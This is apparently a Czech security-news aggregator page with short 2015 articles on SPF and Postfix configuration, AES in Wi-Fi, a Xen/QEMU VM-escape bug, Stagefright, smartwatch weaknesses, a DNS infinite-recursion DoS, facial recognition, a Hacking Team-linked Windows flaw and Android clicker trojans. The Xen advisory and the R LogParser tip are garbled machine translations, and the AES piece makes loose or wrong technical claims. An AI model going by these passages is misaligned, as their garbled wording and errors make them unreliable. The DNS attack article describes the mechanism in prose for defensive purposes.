Z informací od společností a jednotlivců, jejichž doménové jméno bylo zneužité k rozesílání spamu, je zjevné, že takovéto použití domény je velmi nepříjemné a držitel domény, kterého většina adresátů považuje za skutečného odesílatele spamu, pak dostává doslova moře e-mailů. Naštěstí se lze proti zneužití domény k tomuto účelu efektivně bránit.

Existují dva základní přístupy. Jedním je kontrola původu zprávy (SPF Sender Policy Framework), druhým potom kontrola na základě obsahu zprávy (DomainKeys Identified Mail). Obrana se však vždy musí implementovat jak na straně držitele domény, tak u příjemce.

Sender Policy Framework

V téměř všech falešných e-mailových zprávách je adresa odesílatele podvržená. Aby součástí podvržených e-mailových adres nebylo také vámi používané doménové jméno, je třeba zahrnout SPF (Sender Policy Framework) do DNS záznamů dané domény.

SPF je otevřený standard definovaný IETF v RFC 4408, umožňující určit, která zařízení budou autorizována pro odesílání e-mailové pošty s adresou obsahující danou doménu.

Pokud se tato informace vloží do DNS záznamů domény, může si ji příjemce snadno ověřit a v případě neshody zprávu odmítnout ještě před přijetím těla zprávy. Záznam SPF je jednoduchý textový řetězec, který má následující strukturu:

„v=spf1 +mx a:mail.nic.cz –all“

V tomto příkladu přijme server poštu z dané domény pouze v případě, pokud se odeslala z některého ze serverů uvedených v rámci MX záznamů (+mx) nebo ze serveru s IP adresou, na kterou je přeložený A záznam pro mail.nic.cz (a:mail.nic.cz). Pošta z dané domény, která by se poslala z jiných IP adres, se odmítne. Nastavení je možné podle vašich potřeb, viz tabulka.

Obvykle má téměř každé omezení i své stinné stránky a nejinak je tomu i v případě SPF. Před jeho nasazením je třeba zhodnotit možné dopady na omezení povolených odesílatelů e-mailové pošty.

SPF záznam sice vhodně omezuje možné zneužití doménového jména k rozesílání nevyžádané pošty, na druhou stranu však také limituje uživatele ohledně použití konkrétních e-mailových serverů, což někdy bývá překážkou při jeho nasazení. Je také vhodné připomenout, že tento mechanismus je závislý na DNS a v případě podvržení DNS záznamů se tak stane neúčinným.

Implementace SPF kontroly na e-mail serveru

Kromě ošetření SPF záznamů na doméně je také třeba myslet na jejich kontrolu při přijímání pošty na e-mailovém serveru. Pokud neprovozujete vlastní e-mail server, měli byste se informovat u provozovatele e-mailového serveru, zda vykonává kontrolu SPF automaticky či zda je možné ji spustit jako součást antispamové ochrany.

Zda se totiž SPF záznam bude kontrolovat, záleží pouze na provozovateli daného e-mailového serveru. Pokud provozujete vlastní poštovní server, můžete využít základní konfiguraci kontroly SPF pro Postfix a Microsoft Exchange server. Zde je ukázka ohledně Postfixu.

V linuxových distribucích lze vykonávat kontrolu SPF v postfixu pomocí skriptů napsaných v Pythonu nebo Perlu. Instalace pak bude v závislosti na preferovaném jazyku vypadat podle jednoho z následujících příkladů:

sudo apt-get install postfix-policyd-spf-python

nebo

sudo apt-get install postfix-policyd-spf-perl

Následně je třeba přidat do /etc/postfix/main.cf řádek, který zabrání time-outu během zpracovávání e-mailové zprávy:

policy-spf_time_limit = 3600s

Do /etc/postfix/master.cf se pak následně přidá:
policy-spf unix - n n - - spawn
user=nobody argv=/usr/bin/policyd-spf
Pokud jde o Perl, pak se přidá:
policy-spf unix - n n - - spawn
user=nobody argv=/usr/sbin/postfix-policyd-spf-perl

Poslední, co je třeba nastavit, je smtpd_recipient_restrictions v /etc/postfix/main.cf:
smtpd_recipient_restrictions =
...
permit_sasl_authenticated
permit_mynetworks
reject_unauth_destination
check_policy_service unix:private/policy-spf

Po restartu postfixu pak zkontrolujte logy, ve kterých byste nyní měli vidět záznamy o odmítnutí či podržení e-mailu v souvislosti s provedenou SPF kontrolou. Doporučujeme vyhledat si na internetu či v odborné literatuře i další možnosti nastavení SPF.

V případě, že používáte e-mailový server od Microsoftu, v nástroji Edge transport server je spuštěná ve výchozím nastavení služba SenderID. Pokud poštovní server přijme zprávu, Edge transport server se zeptá DNS serveru na záznamy o doméně odesílatele a zkontroluje, zda je IP adresa, ze které zpráva přišla, autorizovaná k odesílání zpráv pro danou doménu.

Podle toho, jak tento proces dopadne, se zprávě přiřadí označení pass, fail, none nebo jiné. Více informací o SenderID můžete získat přímo na stránkách Microsoftu. Pokud používáte jiný e-mailový server než výše uvedené, doporučujeme konzultovat nastavení SPF podle manuálu ke konkrétnímu e-mailovému serveru.

Autorka pracuje jako bezpečnostní analytička ve sdružení CZ.NIC a je členkou národního bezpečnostního týmu CSIRT.CZ.


Šifra, na kterou spoléháme každý den. Jak neprolomitelné je wi-fi?
1.8.2015 Zabezpečení
Spoléháte na ni každý den. Šifra AES patří k nejpoužívanějším. Když se připojíte k wi-fi, "stará" se o bezpečnost vašich dat. Stejně to mají například i v NSA. Dosud byla považována za neprolomitelnou, ale s příchodem kvantových počítačů už to tak být nemusí.
V dnešní době je wi-fi takřka na každém rohu a my uživatelé jsme zvyklí se všude připojovat. Ať už s notebooky nebo mobily, abychom tak "šetřili" svá datová připojení. Jedno z nejčastějších typů zabezpečení wi-fi sítí je WPA2.

Šifruje se standardem, kterému se říká AES - Advanced Encryption Standard. Původní název šifry však zněl Rijndael (vyslovuj rejndál). Tímto kódem je šifrován celý objem dat, který mezi vaším počítačem a internetem "létá vzduchem". Prolomení se věnoval ve své diplomové práci Josef Kokeš z ČVUT - viz boxík ACM SPY 2013. Podle něj, šifru zvládnou rozluštit až kvantové počítače.

V letošním roce bylo z více než 2000 přihlášených prací do hlavní části soutěže vybráno 85 prací z 16 fakult 14 univerzit a vysokých škol v České a Slovenské republice. Z těchto prací odborná porota složená z pedagogů ale i zástupců z "praxe" vybrala 9 nejlepších soutěžních projektů.

Při přihlašování k wi-fi síti jste vyzváni k zadání hesla (v případě zabezpečených sítí). V přihlašovacím procesu router řekne vašemu počítači (wi-fi modulu), jaký klíč k rozluštění dat má použít, a počítač pak veškerá data, která přijímá, tímto klíčem dešifruje. Není to jednoduchý klíč. Pro představu - šifru AES užívá k zabezpečení svých dat běžně i americká Národní bezpečnostní agentura NSA. Od roku 2002 je v USA tato šifra v rámci zabezpečení federálním standardem.

Šifra jako z filmu
Všechny v současnosti standardně používané šifry, se kterými se setkáváte a jsou součástí techniky nebo programů, lze prolomit. Pro generování klíče totiž používají algoritmy. A každý algoritmus jde prolomit hrubou silou.

Proto v případě dnešních standardů se tvůrci zaměřují na výpočetní bezpečnost šifry – tedy jak snadné může být pro útočníka šifru prolomit. Neprolomitelná šifra totiž vyžaduje tři podmínky, aby klíč byl absolutně náhodný, neopakovaný a stejně dlouhý jako samotná zpráva.

Taková šifra existuje, je to Vernamova šifra, a vidět ji můžete v řadě filmů, kde špion luští přijatou zprávu s využitím kódové knihy (nezaměňovat s knižní šifrou, kde slouží jako klíč k určení stránka apod.). Problémem, jak již naznačuje kódovací kniha, je samotná distribuce klíče, který musíte nejen vytvořit, ale rovněž k uživatelům dopravit.

Jak Britové doběhli Rusy. Příběh popravených špionů
Proč je důležité, aby byly dodrženy všechny tři výše uvedené podmínky? To si můžeme ukázat na příkladu britsko-amerického projektu známého jako Venona (několikrát změnil krycí jméno, odtajněn 1995), který se od roku 1943 věnoval luštění sovětských šifer. Sověti používali pro kritické zprávy právě systém jednorázových šifer, ale přesto se podařilo některé jejich zprávy částečně dešifrovat. Sovětská strana totiž použila některé kódovací stránky (ne ovšem celé knihy) opakovaně. S největší pravděpodobností si osoba/osoby pracující na sestavení kódových knih chtěly ušetřit práci se sestavováním, navíc v době, kdy si nikdo nedokázal představit, že západní spojenci mají výpočetní výkon na to, aby dokázali zachytit opakování, a jednoduše pár stran zopakovaly.

Prolomená šifra poslala špiony na popraviště
Příběh manželů Rosenbergových - vzpomíná Karel Pacner
Na smrt špionů rodičů vzpomíná syn
Příběh špiona a komunisty Klause Fuchse v závodu o atomovou bombu.
Samozřejmě se objevují i jiné teorie, že ony stránky byly použity někým, kdo je "zdědil" po svém předchůdci a domníval se, že nebyly použity apod. Každopádně prolomení neprolomitelné šifry vedlo až k odhalení atomových špionů jako byl Klaus Fuchs nebo Rosenbergovi, kdy zprávy z Venony upozornily na existenci sovětské sítě v rámci projektu Manhattan, o které do té doby neměli Američané ani tušení.

Dnes se dokážeme pracností se získáním náhodných čísel vyhnout využití techniky a kvantové fyziky, kdy například měřením času mezi radioaktivním rozpadem jader Geiger-Müllerovým počítačem dostaneme čísla, která lze považovat za absolutně náhodná. Nebo lze využít tepelný šum apod. Stále však zůstává nepraktičnost z hlediska předání klíče.

Zatím neprolomená šifra může podlehnout
Proto se v praxi používají řešení založená na algoritmech, jako je právě AES. I když nesplňuje všechny definice pro nerozluštitelnou šifru, je prolomení AES dost časově náročné. Záměrně neříkáme nemožné, byť se tak na AES v předešlé dekádě pohlíželo vzhledem k počtu možných klíčů - viz boxík - jako na téměř nerozluštitelnou šifru.

Téměř nerozluštitelná šifra
Počet možných klíčů šifry AES je závislý na délce samotného klíče, tedy pokud máte 64bitový klíč, je počet klíčů n64 (zde je n=2, protože počítače pracují s 0 a 1), u 256bitového klíče, který je dnes doporučován, jde o n256.

Zatím neprolomená zůstává i dnes se 128, respektive 256bitovým klíčem. Nicméně rozvoj kvantových počítačů vnesl do oblasti šifrování prvek nejistoty.

Zatímco s běžnými počítači zůstáváme z hlediska výpočetního výkonu i potřebných investic v teoretické rovině prolomení AES s 2256 klíči, v případě kvantových počítačů už tomu tak není.

Proto je stále více na pořadu dne potřeba ověření kvality a odolnosti šifry, což vzhledem k popsané velikosti klíče je standardní cestou značně náročné a zdlouhavé.

Český student šifru nerozluštil, ale skulinky objevil
Student katedry počítačových systémů pražského ČVUT Josef Kokeš však přišel s nápadem, jak tuto šifru zkoumat mnohem efektivněji. V rámci své diplomové práce použil zmenšený model - šifru Baby Rijndael.

Popsal, jak útokem na zmenšený model Baby Rijndael otestoval kvalitu celé rozsáhlé šifry AES. Mimo jiné ve své práci nastínil i potenciál jejího dalšího rozvoje při použití v praxi. I když nenalezl žádnou významnou slabinu, která by vedla k prolomení šifry Rijndael (AES), analyzováním objevil několik nových a dosud nepopsaných rizik v šifře, které je nutné dále zkoumat.

Tímto výzkumem se bude zabývat i v navazujícím doktorandském studiu na ČVUT. Díky jeho přístupu bude nové testování AES výrazně rychlejší a spolehlivější.

Nikoliv šifra, ale vaše hloupé heslo je klíčem
Ačkoliv by se mohlo zdát, že data běžných uživatelů internetu by lepší hackeři dokázali zcizit bez problémů, na vině rozhodně není bezdrátový přenos. Šifrování AES nám všem poskytuje takovou úroveň zabezpečení, že cesta k našim datům nevede přes prolomení šifry, ale získání údajů, na které se soustředí techniky sociálního inženýrství.

Tedy slabá hesla, neuvážené poskytování údajů a infiltrace trojanů a keyloggerů zůstávají hlavními riziky, kterým i nadále bude běžný uživatel čelit. Nejslabším článkem zabezpečení tak i nadále zůstává neopatrný uživatel.


Xen Záplaty VM Útěk Chyba

1.8.2015 Zranitelnosti

Xen Projekt oprava vážnou chybu zabezpečení, která by mohla umožnit útočníkovi v hodnocení virtuálním stroji uniknout a získat možnost spustit libovolný kód na hostitelském počítači. Zranitelnost je v QEMU open source Machine Emulator, který je dodáván jako součást hypervisoru Xen. Problém souvisí se způsobem, že jedna z komponent QEMU je zpracování určitých příkazy. Související příspěvky Neobvyklé Re-Do americké Wassenaarského Pravidla zatleskali 31 července 2015, 12:56 Cisco Opravy DoS zabezpečení v ASR 1000 Směrovače 30 července 2015, 14:55 OwnStar zařízení může vzdáleně Vyhledejte Uvolnit, a Start GM auta 30 července 2015, 09:38 "Přetečení haldy chyba byla nalezena ve způsobu QEMU je IDE subsystém ovládal I přístup / O vyrovnávací paměti při zpracování určitých příkazy ATAPI. výsadní uživatele guest v host s CD-ROM povolenou mohli potenciálně využít tuto chybu spustit libovolný kód na hostitele s výsady QEMU procesu hostitele odpovídá hosta, " poradní Xen říká. Tato zranitelnost, která byla objevena Kevin Wolfa v Red Hat, se týká pouze Xen systémů na systémy x86; ARM systémy na bázi nejsou ohroženy. Postižené verze obsahují Xen 4.5.x, 4.4.x, 4.3.x, 4.2.x, a v qemu-XEN-tradiční odvětví a 4.5.x, 4.4.x, 4.3.x a v qemu-upstream větev. "HVM host, který má přístup k emulovaný IDE CDROM zařízení (např zařízení s "devtype = cdrom", nebo "cdrom" pohodlí alias, v konfiguraci VBD) může zneužít tuto chybu zabezpečení převezme proces QEMU zvednutím výsada, že z QEMU procesu, "říká poradní. V dubnu, výzkumník z CrowdStrike odhalila zranitelnost ve virtuálním řadič disketových jednotek QEMU to , že dovolil útočník uniknout VM a napadnout hostitele. Chyba potřebný útočník být ověřený uživatel na virtuálním stroji.


Tech tip: Vyvolat příkaz systému v oblasti výzkumu

31.7.2015 IT
Trávím hodně času pomocí R, programovací jazyk a softwarové prostředí pro statistické výpočty a grafiku. Je to neuvěřitelně užitečné pro vizualizaci a analýzu, zvažte Data-Driven zabezpečení jako skvělý výchozí bod a reference, spolu s tímto článkem , pokud máte zájem o další.

Jeden z mých nedávných objevů (mám R použití, strašlivé programátor a horší statistika nový), je použití systému pro vyvolání příkazu OS zadaný. Jako příklad, miluji analyzátor protokolu a často používat to, aby analyzovat nebo zapsat log události do CSV. Poté, co v CSV mohou být transformovány a dále analyzovány v mnoha směrech. Jedním z velkých věcí, o výzkumu je schopnost přijímat CSV a použít statický nebo vizuální metody k datům. Se systémem , ve dvou řadách mohu zavolat analyzátor protokolu, vytáhněte protokolu událostí zabezpečení systému Windows, napište to do CSV, a vytvořit datový rámec z toho, že jsem pak mohou udělat libovolný počet dalších skvělých věcí s. Poznámka: táhnout zabezpečení Protokol událostí systému Windows musíte být spuštěna se zvýšenými oprávněním a je třeba spustit R jako admin pro tento příklad scénář.

ve zkratce:

Nastavit pracovní adresář: setwd ("D: / kódování / R / EventVizWork")
Call analyzátor protokolu se systémem: systém ("programu LOGPARSER" Vybrat * do security.csv z bezpečnosti "-i: EVT -o: csv")

Statistika:
-----------
Elements zpracovány: 112155
Elements výstup: 112155
čas: 26,80 sekundy

Přečtěte si výsledky do datového rámce: secevtlog <- read.csv ("security.csv")

Zítra Ukážu vám, co můžeme dělat s ním. :-)


Stagefright: objevena díra v Androidu zneužitelná posláním jedné MMS

28.7.2015 Zranitelnosti

Většina bezpečnostních chyb má společnou jednu věc: aby je útočníci mohli zneužít, potřebují k tomu aktivní „spolupráci“ své oběti – ta musí například stáhnout či otevřít infikovaný soubor, nebo aktivně vykonat jinou akci, která vpustí hackera dovnitř.

Chyba využívající multimediální knihovnu Stagefright v Androidu je ale nebezpečná hlavně kvůli tomu, že se dá zneužít i bez aktivní účasti uživatele, třeba i v době, kdy telefon sám aktivně nepoužívá. Útočníkům k proniknutí do zařízení stačí jen znát jeho telefonní číslo.

Na to mohou poslat MMS obsahující speciálně upravený mediální soubor a je hotovo. „Plně připravený úspěšný útok dokonce může zprávu smazat dříve, než ji uživatel přečte. Zůstane jen upozornění na její doručení,“ upozorňuje Joshua J. Drake z Zimperium Mobile Security, který chybu objevil.

Úspěšný útok může dát hackerovi vládu nad řadou funkcí a aplikací v zařízení – například na mikrofonem či kamerou. Může ale získat i úplný přístup k telefonu. Další podrobnosti o chybě chce Zimperium zveřejnit začátkem srpna na amerických konferencích Black Hat USA a DEF CON 23.

Záplaty jen pro někoho

Podle bezpečnostní firmy jsou chybou ohroženy všechny přístroje s Androidem 2.2 a vyšším. Nejvyšší riziko přitom nesou mobily s verzí starší než Android 4.2 Jelly Bean (jde asi o 11 % zařízení).

Firma na problém upozornila Google a zároveň mu navrhla vlastní záplaty, které jej mají řešit. Google podle ní zareagoval bleskově a do 48 hodin nasadil ve svých vnitřních systémech. Jenže to zdaleka nestačí.

Google totiž neumí záplatovat operační systémy ve všech zařízeních s Androidem. Může leda tak vyzvat výrobce a operátory, aby patche poslali do telefonů svých zákazníků. To ale může trvat a na starší zařízení se oprava ani nemusí dostat.

Jedinou obranou uživatelů tak může být podle některých zdrojů zákaz automatického stahování příloh z MMS, nebo zákaz automatického příjmu MMS jako takových (například v Hangouts).


HP: chytré hodinky nejsou dostatečně bezpečné

28.7.2015 Hrozby
Americká společnost Hewlett-Packard zveřejnila výsledky studie, podle které nejsou dostatečně bezpečné žádné z populárních chytrých hodinek, jež jsou v současné době na trhu.

HP ve studii zkoumalo deset chytrých hodinek a hledalo v nich potenciální rizika, která by mohla ohrozit jejich uživatele - prověřovány byly například technologie používané k ochraně hesel či uložených dat. Výsledek? U všech hodinek bylo nalezeno nejméně jedno riziko.

Jak uvedl bezpečnostní expert Mark James ze společnosti Eset, je zřejmé, že by výrobci smartwatch měli na zabezpečení svých zařízení klást větší důraz. „Tím, že je trh s chytrými hodinkami tak dynamický a rychle se mění, jsou jednotliví výrobci často nuceni vydávat svá zařízení co nejdříve bez ohledu na to, zda jsou bezpečná,“ uvedl James.

HP podle svých slov testovalo 10 nejpopulárnějších smartwatch a hledalo v nich přítomnost bezpečnostních prvků doporučených iniciativou Open Web Application Security Project (OWASP). Cílem OWASP je pomoci výrobcům nositelné elektroniky lépe pochopit bezpečnostní hrozby spojené s internetem věcí.

Z výsledků studie vyplývá, že:

- jen polovina hodinek obsahuje funkci zámku, která by zabránila v přístupu k datům na nich uložených nepovolaným osobám

- devět z deseti smartwatch odesílá data v nešifrované podobě

- třetina hodinek nijak neomezuje počet loginů, díky čemuž útočníci mohou po neomezenou dobu hádat hesla

- dvoje hodinky je možné v případě krádeže jednoduše spárovat s jiným telefonem

Jak uvedlo HP, „výsledky naší studie nás zklamaly, ale nebyly příliš překvapující.“ Podle Daniela Miesslera, který výzkum vedl, začnou výrobci do zabezpečení hodinek investovat až poté, co se o tuto oblast začnou více zajímat zákazníci.

Miessler odmítl sdělit, které hodinky byly testovány, avšak dodal, že HP předalo potřebné informace jejich výrobcům.


Útok na DNS nekonečnou rekurzí

27.7.2015 Počítačový útok

Špetka základů DNS

Nejprve to vezměme trochu ze široka. Když pošlete DNS serveru dotaz, obslouží jej buď rekurzivně, nebo nerekurzivně.

Při rekurzivním chování se dotazu chopí, pokládá dotazy dalším serverům, dokud se mu nepodaří najít odpověď a tu pak pošle tazateli. Tímto způsobem se typicky chovají lokální DNS servery obsluhující zařízení v koncové síti. Pokud se zeptám lokálního serveru na adresu www.root.cz, dostanu odpověď 91.213.160.118. Výhodou rekurzivního chování je, že si server zjištěné informace ukládá do vyrovnávací paměti a při opakovaných dotazech se na ně nemusí znovu ptát, čímž se zrychlují odezvy a celému DNS se ulehčuje. Cenou je, že rekurzivní řešení dotazu server zatěžuje.

Nerekurzivně se chovající server se dotazem podrobněji nezabývá, jen pošle informace o serverech, které jsou blíže k jeho řešení. Sám se jich ale neptá, to musí udělat tazatel. Nerekurzivně se chovají autoritativní servery. Kdybych se třeba některého z autoritativních serverů domény cz zeptal na adresu www.root.cz, dostanu odpověď „zeptej se ns.iinfo.cz nebo ns6.adminit.cz“, což jsou autoritativní servery domény root.cz, které jsou o krok blíže k odpovědi. Má-li k dispozici jejich adresy, přiloží je k odpovědi.

Princip útoku

Útok nekonečnou rekurzí spočívá v tom, že si autoritativní server zlobivé domény vymýšlí stále nové a nové servery „bližší“ řešení, které ale leží ve stejné doméně, takže se na jejich adresy musíme ptát zase jeho. Na každý takový dotaz odpoví opět odkazem na další smyšlené servery.

Řekněme, že se takovým způsobem bude chovat autoritativní server domény zlo.root.cz. Doména by měla mít alespoň dva autoritativní servery, ale buď se budou oba chovat stejně, nebo zlí hoši prostě nebudou doporučení respektovat. Dále pro zjednodušení budeme zmiňovat jen jeden.

Útok začne tím, že někdo někde projeví zájem třeba o adresu pro www.zlo.root.cz. Buď útočník využije otevřený rekurzivní server a položí mu dotaz sám, nebo přiměje některého z místních uživatelů k návštěvě tohoto webu – phishingem, příslibem atraktivního obsahu nebo jinak.

Místní rekurzivní server, který byl osloven, je cílem útoku. Pustí se do řešení dotazu: Standardním způsobem začne v kořenové doméně a postupně bude nerekruzivními servery odkázán na autoritativní servery pro domény cz, root.cz a zlo.root.cz. Až dosud vše probíhá normálně.

Jelikož hledané jméno je v doméně zlo.root.cz, normálně by její autoritativní server (řekněme ns.zlo.root.cz) poslal odpověď. On ale místo toho v odpovědi prohlásí, že je třeba ptát se serveru ns1.zlo.root.cz nebo ns2.zlo.root.cz. A neposkytne jejich adresy, což by korektně se chovající server udělal.

Oba „bližší“ servery mají jména v doméně zlo.root.cz, takže nezbývá, než jejich adresy shánět opět u ns.zlo.root.cz, který je jejím autoritativním serverem. Na dotaz po adrese ns1.zlo.root.cz ovšem odpoví, že je třeba ptát se u ns3.zlo.root.cz nebo ns4.zlo.root.cz, zatímco adresu ns2.zlo.root.cz prý znají ns3.zlo.root.cz nebo ns4.zlo.root.cz. A tak dále pořád dokola.

Kdykoli se jej zeptáte na adresu některého z údajných serverů, dostanete jen odkaz na další nové servery, jejichž adresy ovšem musíte poptávat zase u něj. Jejich jména mohou být vytvářena algoritmicky – například zde dotaz na server nsX vede k odkazu na servery ns(2X+1) a ns(2X+2) – nebo se prostě generují náhodně.

Rekurzivnímu serveru se exponenciálním tempem množí úkoly a odpověď je stále v nedohlednu. Server tak postupně vyčerpává dostupné zdroje, dokud není zahlcen do té míry, že přestává zpracovávat další dotazy lokálních strojů, pro které se DNS stane téměř nedostupným. Bylo zaznamenáno i zhroucení některých programů.

Útok existuje také v upravené variantě, vyvolávající DoS prakticky do libovolné sítě. V tom případě server do odpovědi vloží více falešných autoritativních serverů. Některé ponechá bez adres, aby se tazatel vracel a udržoval útok v chodu. K jiným přibalí adresy, na které chce útočit. Rekurzivní server řešící původní dotaz zajásá, že má konečně nějaké adresy, a obešle je dotazy. Na napadených adresách samozřejmě nemusí běžet DNS servery – dotazy ze strany rekurzivního serveru budou prostě jen zatěžovat tyto stroje a síťovou infrastrukturu k nim vedoucí. A pokud jich bude dost…

Útok nekonečnou rekurzí má poměrně neobvyklé vlastnosti. Typický DoS útok vyvolá armáda útočících strojů posílajících mraky požadavků, často s padělanými adresami. Zde útočníkovi v zásadě stačí zahajovací dotaz a jeden (či několik málo) nemravně se chovající autoritativní DNS server. Navíc v DNS komunikaci nemusí porušit jediné RFC. Posílané zprávy odpovídají standardům, jen v jejich obsahu si vymýšlí.

Obrana

První linií obrany je samozřejmě neprovozovat otevřený rekurzivní server, tedy přijímat dotazy jen z lokální sítě. Tím významně omezíte možnost položit startovací dotaz. Pokud by chtěl útočník napadnout váš rekurzivní server, musel by nejprve ovládnout některý z vašich počítačů nebo nalákat některého uživatele.

Skutečnost, že útok je založen na zlovolném chování autoritativního serveru určité domény, usnadňuje obranu. Pokud zjistíte, že se váš rekurzivní server stal obětí nekonečné rekurze, stačí zablokovat inkriminovanou doménu. Třeba tak, že svůj rekurzivní server nastavíte jako její autoritativní. Většina programů implementujících rekurzivní servery to umožňuje.

Nejlepší zpráva přijde nakonec: pokud udržujete svůj DNS software aktuální, pravděpodobně se vás tento útok vůbec netýká. Byl oficiálně oznámen počátkem prosince 2014 a současně s ním vyšly opravy pro BIND, Unbound a další programy.

e-book_prehistorie_pocitacu

Aby byl útok nekonečnou rekurzí úspěšný, musí být rekurzivní server ochoten věnovat řešení dotazu prakticky neomezené úsilí. Opravy proto směřovaly právě do této oblasti a autoři programů zavedli různé hranice. Přístupy se liší – někde omezili hloubku řešení dotazu, jinde šířku, počet zpráv nebo celkovou dobu řešení. Nějaká omezení ale má dnes prakticky každý. Pokud by vás zajímaly podrobnosti, najdete je na 33. stránce prezentace Floriana Mauryho [PDF].

Paradoxní je, že už základní specifikace DNS v RFC 1034 obsahuje doporučení, že množství práce věnované řešení dotazu by mělo být omezeno, aby případná chyba v datech nezpůsobila trable. Netrvalo to ani třicet let a došlo na ně.


Rozpoznávání obličeje v praxi (2)

27.7.2015 Biometrika
Potenciál technologie rozpoznávání obličeje je významný, i když se ho ještě nepodařilo plně zužitkovat.

Kromě přesnosti je u rozpoznávání obličeje další důležitou oblastí také soukromí. Z důvodu dosažení účinnosti technologie obvykle vyžaduje buď uložení naskenovaného obličeje do backendové databáze, nebo kontrolu vůči obličeji, který tam již je.

„Přemýšlíte o kamerách, které neustále zachycují obličeje a zjišťují, o koho jde? Ano, jsou zde obavy o soukromí,“ souhlasí Hauhn. „Je však potřeba zodpovědět tradiční otázku: jaké je přiměřené očekávání soukromí?“

Jak Hauhn podotýká, existuje už mnoho kamer umístěných ve velkých městech, které zachycují lidi každý den, a běžným lidem to obvykle nevadí. Jakmile však do této rovnice vstoupí rozpoznávání obličejů a kamery budou vědět, kdo jste a kde se v daný okamžik nacházíte, otázky v souvislosti se soukromím se změní. Nakonec se však bude rozsah nesouhlasu pravděpodobně individuálně lišit, dodává.

„Ať už se na to díváte jakkoli, otázky ohledně soukromí se nakonec týkají toho, jaký je váš názor na Velkého bratra,“ připomíná Hauhn. „Získáte tolik různých stanovisek, kolik je lidí.“

A co otázka, jak dlouho budou tyto skeny obličejů uložené v backendové databázi? Hauhn uvádí, že policejní oddělení prohlašují, že potřebují uchování těchto údajů 30 dní v případě, že je nutné udělat šetření, kde lidé byli v určitých dnech, a „to jsou záležitosti, jež děsí lidi, kterým záleží na soukromí“.

Existují však postupně implementovaná opatření pro regulaci, jak dlouho se smějí taková osobní data uchovávat, uvádí Lorenz.

„Ano, existují určité obavy týkající se soukromí. V současné době je mnoho zákonů souvisejících s osobními biometrickými údaji,“ připomíná Lorenz.

„Zaměřují se na řadu otázek, jako je například způsob ochrany, používání, zpracování a ukládání dat. A další oblastí je problematika uchovávání. Jakmile vyřešíte tuto záležitost, musíte se také zabývat skartací dat. Podobně tomu je se šifrováním – používáte v back-endu šifrování? Jaká užíváte opatření pro zabezpečení a ochranu před neoprávněnou manipulací?“

I když existuje mnoho zákonů na ochranu osobních údajů, liší se podle jednotlivých států a obvykle se týkají důvěrnosti biometrických údajů jako celku.

Může nějakou dobu trvat, než dojde ke standardizované regulaci rozpoznávání obličejů. Koneckonců rozpoznávání obličejů je zatím v raném stadiu procesu růstu, uvádí Lorenz.

„Shromažďování těchto údajů a související analýzy nyní dozrávají,“ prohlašuje. „Existuje mnoho analýz, které dnes kamery zvládnou, a rozpoznávání obličejů je jen jednou z komponent.“


Kritickou zranitelnost ve Windows zneužívali hackeři

26.7.2015 Incidenty
V operačním systému Windows byla odhalena kritická bezpečnostní chyba. Zranitelnost, kterou se již podařilo počítačovým pirátům zneužít, je naštěstí možné snadno opravit. Společnost Microsoft totiž tento týden vydala opravnou aktualizaci.
Kritická zranitelnost ve Windows byla odhalena poté, co na internet unikla databáze italské bezpečnostní společnosti Hacking Team. Před chybou varoval Národní bezpečnostní tým CSIRT.CZ.

„Microsoft vydal záplatu pro zranitelnost, která byla nalezena ve velkém souboru dat, který byl zveřejněn po průniku do italské společnosti Hacking Team. Microsoft označil zranitelnost jako kritickou, protože se týká přímo Kernelu (jádra systému, pozn. red.),“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Podle něj se zranitelnost týká různých verzí Windows – Vista, 7, 8 či Server 2008. „Je vysoce pravděpodobné, že se nachází také na již nepodporovaných verzích, jako je např. Windows XP či v připravovaném releasu Windows 10,“ konstatoval Bašta.

Chybu mohou počítačoví piráti zneužít k propašování libovolného škodlivého kódu do cizích počítačů. Zamezit jim v tom má právě uvolněná aktualizace. Stahovat ji je možné prostřednictvím služby Windows Update.

Špionážní software = miliónový byznys
Kauza okolo uniklé databáze Hacking Teamu ukazuje, jak tenká je hranice mezi počítačovými bezpečnostními experty a plnokrevnými hackery. I když by se mohlo na první pohled zdát, že zmiňovaná italská společnost má blíže k tomu druhému, ve skutečnosti zaměstnanci Hacking Teamu pracovali na obou stranách barikády. Milióny si tak nechali vyplácet dvakrát.

Z uniklé databáze, která obsahuje stovky gigabajtů dat a která koluje od minulého týdne internetem, totiž vyplývá, že nezanedbatelnou část příjmů společnosti Hacking Team tvoří ty z auditorské činnosti. Kromě vývoje šmírovacích programů, které zneužívaly podobných chyb, jako byla ta ve Flash Playeru, totiž italský podnik hodnotil a prověřoval zabezpečení webových stránek i interních systémů firem prakticky ze všech koutů světa.

Detailní plány zabezpečení tak dostali tito bezpečnostní experti naservírované doslova na dlani. Se všemi těmito znalostmi pak pro ně bylo velmi snadné vytvářet tzv. exploity, tedy speciální programy umožňující získat přístup na nejrůznější weby či služby za účelem napadení zmiňovaných subjektů.


Eset: Na Google Play jsou stále nové podvodné aplikace

25.7.2015 Viry
Analytici společnosti Eset objevili dalších 51 podvodných aplikací, každou s nejméně 100 tisíci stažení, které se skrytě připojují k pornostránkám.
Na Google Play, oficiálním obchodu s aplikacemi pro platformu Android, se stále objevují nové podvodné aplikace. Skupinou aplikací, které jejich tvůrci dokáží opakovaně v nových variantách dostávat přes zpřísněnou kontrolu na Google Play, jsou takzvané klikající trojany. Jde o malware, který bez vědomí majitele smartphonu nebo tabletu generuje provoz na určených internetových stránkách.

Analytici Eset tento malware na Google Play dlouhodobě sledují. V květnu 2015 odhalili „klikající trojan“ v podvodné aplikaci imitující populární hru Dubsmash. Google v reakci na upozornění Eset aplikaci okamžitě vyřadil z Google Play a uživatele před ní varuje. Podvodníci (podle analýzy kódu jde o stále stejné vývojáře) však dokázali za poslední tři měsíce dostat na Google Play tuto podvodnou aplikaci v různých variantách nejméně 24x.

Analytici Eset objevili „klikající trojany“ také v podvodných verzích dalších populárních aplikací jako Clash of Clans, Subway Surfers nebo Minecraft, a také v různých video downloaderech nebo download managerech. Celkem jde o 51 aplikací, které měly – navzdory často negativním recenzím uživatelů – statisíce stažení.

Odhalené „klikající trojany“ fungují tak, že se připojují k předem definovaným pornostránkám a generují tak na nich fiktivní provoz. Při každém startu však zkontrolují, jestli na přístroji neběží některá z antivirových aplikací. Pokud najdou některý z 16 předem zadaných antivirů, vůbec žádnou aktivitu nevyvíjejí.

